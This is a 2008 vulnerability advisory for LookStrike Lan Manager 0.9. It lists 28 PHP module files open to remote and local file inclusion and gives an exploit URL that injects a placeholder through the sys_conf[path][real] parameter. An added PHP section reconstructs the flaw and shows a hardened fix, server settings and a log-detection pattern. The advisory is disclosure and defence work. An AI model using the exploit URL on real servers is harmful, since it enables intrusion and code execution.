
# Title : LookStrike Lan Manager 0.9 Remote / Local File Inclusion Vulnerabilities
# Published : 2008-02-14
# Author : MhZ91


--==+================================================================================+==--
--==+		LookStrike Lan Manager v0.9 Remote/Local File Inclusion             +==--
--==+================================================================================+==--

 Author: MhZ91
 Title: LookStrike Lan Manager v0.9 Remote/Local File Inclusion
 Download: http://sourceforge.net/project/showfiles.php?group_id=152660
 Bug: Remote/Local File Inclusion
 Info: LookStrike is a tool written in PHP for managing LAN parties; it saves a lot of time on the administration of your LAN and also gathers statistics about your players. LookStrike generates graphics and tournament matches automatically.
 Visit: http://www.inj3ct-it.org

[*]----------------------------------------------------------

LookStrike Lan Manager v0.9 contains a remote/local file inclusion vulnerability in the following files:

modules/class/Table.php
modules/class/db/db_admins.php
modules/class/db/db_alert.php
modules/class/db/db_double.php
modules/class/db/db_games.php
modules/class/db/db_matches.php
modules/class/db/db_match_teams.php
modules/class/db/db_news.php
modules/class/db/db_platform.php
modules/class/db/db_players.php
modules/class/db/db_server_group.php
modules/class/db/db_server_ip.php
modules/class/db/db_teams.php
modules/class/db/db_team_players.php
modules/class/db/db_tournaments.php
modules/class/db/db_tournament_teams.php
modules/class/db/db_trees.php
modules/class/tournament/Match.php
modules/class/tournament/MatchTeam.php
modules/class/tournament/Rule.php
modules/class/tournament/RuleBuilder.php
modules/class/tournament/RulePool.php
modules/class/tournament/RuleSingle.php
modules/class/tournament/RuleTree.php
modules/class/tournament/Tournament.php
modules/class/tournament/TournamentTeam.php
modules/class/tournament/Tree.php
modules/class/tournament/TreeSingle.php

All of them are exploitable through the variable "sys_conf[path][real]", for example:

http://www.example.com/modules/class/Table.php?sys_conf[path][real]=[Evil_Code]
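The following is an added illustration, not code from LookStrike or from the advisory's author, of the pattern behind this class of bug and of how to close it. It assumes, as the advisory's URL implies, that the module files build their include paths from a global array `$sys_conf` that index.php normally fills and that a request can populate instead when the files are hit directly (register_globals). The function names, the `LOOKSTRIKE_ENTRY` constant and the temporary directory layout are assumptions made for the demonstration.

```php
<?php
// Added example (not LookStrike's own code). Reconstructs the "include path
// taken from a global array" pattern and shows a hardened replacement.
// Function names, LOOKSTRIKE_ENTRY and the demo layout are hypothetical.

// ---- Vulnerable pattern ------------------------------------------------
// A module file assumes index.php already filled $sys_conf, but it is also
// reachable directly. With register_globals=On, the query string
// ?sys_conf[path][real]=... creates that array, so the include prefix is
// request-controlled: a remote URL if allow_url_include is on, an arbitrary
// local path otherwise.
function vulnerableIncludePath(array $sys_conf): string
{
    return $sys_conf['path']['real'] . '/modules/class/db/db.php';
}

// ---- Hardened pattern --------------------------------------------------
// 1. The install root comes from the file's own location (__DIR__), never
//    from a variable that request data could populate.
// 2. realpath() collapses ../ segments and symlinks before the check.
// 3. The resolved path must stay under the root; anything else is refused.
function hardenedIncludePath(string $root, string $relative): string
{
    $root = realpath($root);
    $candidate = ($root === false) ? false
        : realpath($root . DIRECTORY_SEPARATOR . $relative);
    if ($root === false || $candidate === false
        || strpos($candidate, $root . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException("refused include outside install root: $relative");
    }
    return $candidate;
}

// 4. Each module that must only run via index.php starts with this guard;
//    index.php defines LOOKSTRIKE_ENTRY before including anything.
function denyDirectAccess(): void
{
    if (!defined('LOOKSTRIKE_ENTRY')) {
        header('HTTP/1.1 403 Forbidden');
        exit('direct access not permitted');
    }
}

// ---- Demonstration on a constructed layout ------------------------------
$root = sys_get_temp_dir() . '/lookstrike_demo_' . getmypid();
mkdir("$root/modules/class/db", 0700, true);
file_put_contents("$root/modules/class/db/db.php", "<?php\n");

// The vulnerable builder uses whatever the "request" supplied (constructed
// value, same placeholder the advisory uses).
$fromRequest = ['path' => ['real' => '[Evil_Code]']];
echo "vulnerable: ", vulnerableIncludePath($fromRequest), "\n";

// The hardened builder only ever resolves inside $root.
echo "hardened:   ", hardenedIncludePath($root, 'modules/class/db/db.php'), "\n";
try {
    hardenedIncludePath($root, '../../../../etc/passwd');
} catch (RuntimeException $e) {
    echo "blocked:    ", $e->getMessage(), "\n";
}

// Clean up the constructed layout.
unlink("$root/modules/class/db/db.php");
rmdir("$root/modules/class/db");
rmdir("$root/modules/class");
rmdir("$root/modules");
rmdir($root);
```

Run it with `php` from the command line. Two server-side settings reduce the exposure independently of the code fix: `register_globals = Off` (the PHP default since 4.2 and removed altogether in 5.4) stops the query string from creating `$sys_conf`, and `allow_url_include = Off` turns the remote variant into a local one. For detection, web server access logs for requests to the listed module files whose query string contains `sys_conf[path][real]` (or its URL-encoded form `sys_conf%5Bpath%5D%5Breal%5D`) are a direct indicator, since no legitimate request passes that parameter.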


[*]----------------------------------------------------------

# www.Syue.com [2008-02-14]